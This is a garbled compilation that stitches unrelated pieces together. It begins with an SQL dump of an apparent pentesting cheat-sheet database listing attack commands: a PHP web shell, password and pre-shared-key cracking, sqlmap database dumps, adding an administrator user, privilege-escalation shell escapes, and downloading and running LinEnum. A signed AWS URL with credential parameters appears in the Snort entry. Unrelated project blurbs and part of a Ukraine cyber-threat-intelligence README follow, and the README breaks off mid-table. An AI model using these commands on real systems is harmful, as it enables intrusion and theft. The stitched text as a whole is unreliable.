NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;

Uses rpcdump to locate the ADCS server, and identify if ESC8 is vulnerable from unauthenticated perspective.

network notary implementation for the Perspectives project

Enhanced Model Context Protocol (MCP) server for OmniFocus with complete subtask support, perspective views (Inbox/Flagged/Forecast/Tags), ultimate task filtering, and direct access to custom perspectives. Seamlessly integrate OmniFocus with Claude AI for intelligent task management.

A simple nodejs server to allow controlled access to the Perspective API

A dual-perspective thinking analysis server based on Model Context Protocol (MCP), providing comprehensive performance evaluation through Actor-Critic methodology.

Fusion of data from multiple sensors requires precisely matching the perspective of each sensor on the robot to the transforms used to merge the data. These sensor alignments (extrinsic calibration) can be time-consuming to perform. The multi-sensor alignment package presented in this work fills this gap by delivering tools to create an alignment joint for each sensor. The alignment joint includes a dynamic param server to rapidly adjust a sensor’s position and orientation during live operation. Further, the adjusted positions can be saved and automatically loaded on subsequent launches of the node.

​ ​#​ ​Ukraine-Cyber-Operations ​Curated Intelligence is working with analysts from around the world to provide useful information to organisations in Ukraine looking for additional free threat intelligence. Slava Ukraini. Glory to Ukraine. ([​Blog​](https://www.curatedintel.org/2021/08/welcome.html) | [​Twitter​](https://twitter.com/CuratedIntel) | [​LinkedIn​](https://www.linkedin.com/company/curatedintelligence/)) ​ ​ ​###​ ​Analyst Comments: ​-​ 2022-02-25 ​  ​-​ Creation of the initial repository to help organisations in Ukraine ​  ​-​ Added [​Threat Reports​](https://github.com/curated-intel/Ukraine-Cyber-Operations#threat-reports) section ​  ​-​ Added [​Vendor Support​](https://github.com/curated-intel/Ukraine-Cyber-Operations#vendor-support) section ​-​ 2022-02-26 ​  ​-​ Additional resources, chronologically ordered (h/t Orange-CD) ​  ​-​ Added [​Vetted OSINT Sources​](https://github.com/curated-intel/Ukraine-Cyber-Operations#vetted-osint-sources) section  ​  ​-​ Added [​Miscellaneous Resources​](https://github.com/curated-intel/Ukraine-Cyber-Operations#miscellaneous-resources) section ​-​ 2022-02-27 ​  ​-​ Additional threat reports have been added ​  ​-​ Added [​Data Brokers​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/README.md#data-brokers) section ​  ​-​ Added [​Access Brokers​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/README.md#access-brokers) section ​-​ 2022-02-28 ​  ​-​ Added Russian Cyber Operations Against Ukraine Timeline by ETAC ​  ​-​ Added Vetted and Contextualized [​Indicators of Compromise (IOCs)​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/ETAC_Vetted_UkraineRussiaWar_IOCs.csv) by ETAC ​-​ 2022-03-01 ​  ​-​ Additional threat reports and resources have been added ​-​ 2022-03-02 ​  ​-​ Additional [​Indicators of Compromise (IOCs)​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2011) have been added ​  ​-​ Added vetted [​YARA rule collection​](https://github.com/curated-intel/Ukraine-Cyber-Operations/tree/main/yara) from the Threat Reports by ETAC ​  ​-​ Added loosely-vetted [​IOC Threat Hunt Feeds​](https://github.com/curated-intel/Ukraine-Cyber-Operations/tree/main/KPMG-Egyde_Ukraine-Crisis_Feeds/MISP-CSV_MediumConfidence_Filtered) by KPMG-Egyde CTI (h/t [​0xDISREL​](https://twitter.com/0xDISREL)) ​    ​-​ IOCs shared by these feeds are ​`LOW-TO-MEDIUM CONFIDENCE`​ we strongly recommend NOT adding them to a blocklist ​    ​-​ These could potentially be used for ​`THREAT HUNTING`​ and could be added to a ​`WATCHLIST` ​    ​-​ IOCs are generated in ​`MISP COMPATIBLE`​ CSV format ​-​ 2022-03-03 ​  ​-​ Additional threat reports and vendor support resources have been added ​  ​-​ Updated [​Log4Shell IOC Threat Hunt Feeds​](https://github.com/curated-intel/Log4Shell-IOCs/tree/main/KPMG_Log4Shell_Feeds) by KPMG-Egyde CTI; not directly related to Ukraine, but still a widespread vulnerability. ​  ​-​ Added diagram of Russia-Ukraine Cyberwar Participants 2022 by ETAC ​  ​-​ Additional [​Indicators of Compromise (IOCs)​](https://github.com/curated-intel/Ukraine-Cyber-Operations/blob/main/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2042) have been added ​####​ ​`Threat Reports` ​| Date | Source | Threat(s) | URL | ​| --- | --- | --- | --- | ​| 14 JAN | SSU Ukraine | Website Defacements | [ssu.gov.ua](https://ssu.gov.ua/novyny/sbu-rozsliduie-prychetnist-rosiiskykh-spetssluzhb-do-sohodnishnoi-kiberataky-na-orhany-derzhavnoi-vlady-ukrainy)| ​| 15 JAN | Microsoft | WhisperGate wiper (DEV-0586) | [microsoft.com](https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/) | ​| 19 JAN | Elastic | WhisperGate wiper (Operation BleedingBear) | [elastic.github.io](https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/) | ​| 31 JAN | Symantec | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [symantec-enterprise-blogs.security.com](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine) | ​| 2 FEB | RaidForums | Access broker "GodLevel" offering Ukrainain algricultural exchange | RaidForums [not linked] | ​| 2 FEB | CERT-UA | UAC-0056 using SaintBot and OutSteel malware | [cert.gov.ua](https://cert.gov.ua/article/18419) | ​| 3 FEB | PAN Unit42 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [unit42.paloaltonetworks.com](https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/) | ​| 4 FEB | Microsoft | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [microsoft.com](https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/) | ​| 8 FEB | NSFOCUS | Lorec53 (aka UAC-0056, EmberBear, BleedingBear) | [nsfocusglobal.com](https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government) | ​| 15 FEB | CERT-UA | DDoS attacks against the name server of government websites as well as Oschadbank (State Savings Bank) & Privatbank (largest commercial bank). False SMS and e-mails to create panic | [cert.gov.ua](https://cert.gov.ua/article/37139) | ​| 23 FEB | The Daily Beast | Ukrainian troops receive threatening SMS messages | [thedailybeast.com](https://www.thedailybeast.com/cyberattacks-hit-websites-and-psy-ops-sms-messages-targeting-ukrainians-ramp-up-as-russia-moves-into-ukraine) | ​| 23 FEB | UK NCSC | Sandworm/VoodooBear (GRU) | [ncsc.gov.uk](https://www.ncsc.gov.uk/files/Joint-Sandworm-Advisory.pdf) | ​| 23 FEB | SentinelLabs | HermeticWiper | [sentinelone.com]( https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/ ) | ​| 24 FEB | ESET | HermeticWiper | [welivesecurity.com](https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/) | ​| 24 FEB | Symantec | HermeticWiper, PartyTicket ransomware, CVE-2021-1636, unknown webshell | [symantec-enterprise-blogs.security.com](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia) | ​| 24 FEB | Cisco Talos | HermeticWiper | [blog.talosintelligence.com](https://blog.talosintelligence.com/2022/02/threat-advisory-hermeticwiper.html) | ​| 24 FEB | Zscaler | HermeticWiper | [zscaler.com](https://www.zscaler.com/blogs/security-research/hermetic-wiper-resurgence-targeted-attacks-ukraine) | ​| 24 FEB | Cluster25 | HermeticWiper | [cluster25.io](https://cluster25.io/2022/02/24/ukraine-analysis-of-the-new-disk-wiping-malware/) | ​| 24 FEB | CronUp | Data broker "FreeCivilian" offering multiple .gov.ua | [twitter.com/1ZRR4H](https://twitter.com/1ZRR4H/status/1496931721052311557)| ​| 24 FEB | RaidForums | Data broker "Featherine" offering diia.gov.ua | RaidForums [not linked] | ​| 24 FEB | DomainTools | Unknown scammers | [twitter.com/SecuritySnacks](https://twitter.com/SecuritySnacks/status/1496956492636905473?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | ​| 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [twitter.com/500mk500](https://twitter.com/500mk500/status/1497339266329894920?s=20&t=opOtwpn82ztiFtwUbLkm9Q) | ​| 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | [twitter.com/500mk500](https://twitter.com/500mk500/status/1497208285472215042)| ​| 25 FEB | Microsoft | HermeticWiper | [gist.github.com](https://gist.github.com/fr0gger/7882fde2b1b271f9e886a4a9b6fb6b7f) | ​| 25 FEB | 360 NetLab | DDoS (Mirai, Gafgyt, IRCbot, Ripprbot, Moobot) | [blog.netlab.360.com](https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/) | ​| 25 FEB | Conti [themselves] | Conti ransomware, BazarLoader | Conti News .onion [not linked] | ​| 25 FEB | CoomingProject [themselves] | Data Hostage Group | CoomingProject Telegram [not linked] | ​| 25 FEB | CERT-UA | UNC1151/Ghostwriter (Belarus MoD) | [CERT-UA Facebook](https://facebook.com/story.php?story_fbid=312939130865352&id=100064478028712)| ​| 25 FEB | Sekoia | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com/sekoia_io](https://twitter.com/sekoia_io/status/1497239319295279106) | ​| 25 FEB | @jaimeblascob | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com/jaimeblasco](https://twitter.com/jaimeblascob/status/1497242668627370009)| ​| 25 FEB | RISKIQ | UNC1151/Ghostwriter (Belarus MoD) | [community.riskiq.com](https://community.riskiq.com/article/e3a7ceea/) | ​| 25 FEB | MalwareHunterTeam | Unknown phishing | [twitter.com/malwrhunterteam](https://twitter.com/malwrhunterteam/status/1497235270416097287) | ​| 25 FEB | ESET | Unknown scammers | [twitter.com/ESETresearch](https://twitter.com/ESETresearch/status/1497194165561659394) | ​| 25 FEB | BitDefender | Unknown scammers | [blog.bitdefender.com](https://blog.bitdefender.com/blog/hotforsecurity/cybercriminals-deploy-spam-campaign-as-tens-of-thousands-of-ukrainians-seek-refuge-in-neighboring-countries/) | ​| 25 FEB | SSSCIP Ukraine | Unkown phishing | [twitter.com/dsszzi](https://twitter.com/dsszzi/status/1497103078029291522) | ​| 25 FEB | RaidForums | Data broker "NetSec"  offering FSB (likely SMTP accounts) | RaidForums [not linked] | ​| 25 FEB | Zscaler | PartyTicket decoy ransomware | [zscaler.com](https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware) | ​| 25 FEB | INCERT GIE | Cyclops Blink, HermeticWiper | [linkedin.com](https://www.linkedin.com/posts/activity-6902989337210740736-XohK) [Login Required] | ​| 25 FEB | Proofpoint | UNC1151/Ghostwriter (Belarus MoD) | [twitter.com/threatinsight](https://twitter.com/threatinsight/status/1497355737844133895?s=20&t=Ubi0tb_XxGCbHLnUoQVp8w) | ​| 25 FEB | @fr0gger_ | HermeticWiper capabilities Overview | [twitter.com/fr0gger_](https://twitter.com/fr0gger_/status/1497121876870832128?s=20&t=_296n0bPeUgdXleX02M9mg) ​| 26 FEB | BBC Journalist | A fake Telegram account claiming to be President Zelensky is posting dubious messages | [twitter.com/shayan86](https://twitter.com/shayan86/status/1497485340738785283?s=21) | ​| 26 FEB | CERT-UA | 